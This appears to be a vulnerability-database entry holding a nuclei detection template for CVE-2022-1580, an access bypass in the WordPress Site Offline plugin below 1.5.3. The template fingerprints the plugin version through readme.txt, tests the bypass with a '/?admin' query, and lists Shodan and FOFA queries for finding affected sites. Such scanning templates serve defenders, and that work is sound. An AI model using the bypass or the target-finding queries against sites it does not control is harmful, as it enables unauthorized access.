Site Offline WP Plugin < 1.5.3 - Authorization Bypass

02 Jul 2026 09:36:57 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com | Views: 30

Site Offline WP Plugin < 1.5.3 - Authorization Bypass. The plugin prevents access to the website unless specific keywords are included in the URL query string.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| ATTACKERKB | CVE-2022-1580 | 19 Sep 2022 14:15 | attackerkb |
| Circl | CVE-2022-1580 | 19 Sep 2022 18:38 | circl |
| CNNVD | WordPress plugin Site Offline security vulnerability | 19 Sep 2022 00:00 | cnnvd |
| CVE | CVE-2022-1580 | 19 Sep 2022 14:00 | cve |
| Cvelist | CVE-2022-1580 Site Offline < 1.5.3 - Access Bypass | 19 Sep 2022 14:00 | cvelist |
| EUVD | EUVD-2022-24871 | 3 Oct 2025 20:07 | euvd |
| NVD | CVE-2022-1580 | 19 Sep 2022 14:15 | nvd |
| OSV | CVE-2022-1580 | 19 Sep 2022 14:15 | osv |
| Patchstack | WordPress Site Offline plugin <= 1.4.9 - Access Bypass vulnerability | 29 Aug 2022 00:00 | patchstack |
| Prion | Spoofing | 19 Sep 2022 14:15 | prion |

id: CVE-2022-1580

info:
  name: Site Offline WP Plugin < 1.5.3 - Authorization Bypass
  author: s4e-io
  severity: medium
  description: |
    The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature.
  impact: |
    Attackers can bypass the site offline/maintenance mode by adding specific keywords to the URL query string, gaining unauthorized access to the website.
  remediation: Fixed in 1.5.3
  reference:
    - https://wpscan.com/vulnerability/7b6f91cd-5a00-49ca-93ff-db7220d2630a/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1580
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2022-1580
    cwe-id: CWE-639
    epss-score: 0.01299
    epss-percentile: 0.66883
    cpe: cpe:2.3:a:freehtmldesigns:site_offline:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: freehtmldesigns
    product: "site_offline"
    framework: wordpress
    publicwww-query: "/wp-content/plugins/site-offline/"
    shodan-query: http.html:/wp-content/plugins/site-offline/
    fofa-query: body=/wp-content/plugins/site-offline/
  tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp,freehtmldesigns,vuln
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/site-offline/readme.txt"

    matchers:
      - type: word
        internal: true
        words:
          - "Site Offline Or Coming Soon Or Maintenance Mode"

    extractors:
      - type: regex
        part: body
        group: 1
        name: version
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/?admin"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "wp-block", "author")'
          - "status_code == 200"
          - "compare_versions(version, '< 1.5.3')"
        condition: and
# digest: 490a00463044022028f608c09e36bc26d53922cf1543d3d7313ee87b2be209822aefde00bcc68426022024a44c52bbfeb46ec7b0b88f573aeb7766b5e45a3a23a3f2ec98dfe96dab05d5:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00 (Current)
Vulners AI Score: 5.8 (Medium risk)
CVSS 3.1: 4.3
EPSS: 0.01299